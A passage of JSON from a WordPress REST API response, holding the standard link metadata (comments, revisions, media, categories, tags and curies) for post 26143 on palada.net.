www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=26143"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/26143\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=26143"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=26143"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=26143"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}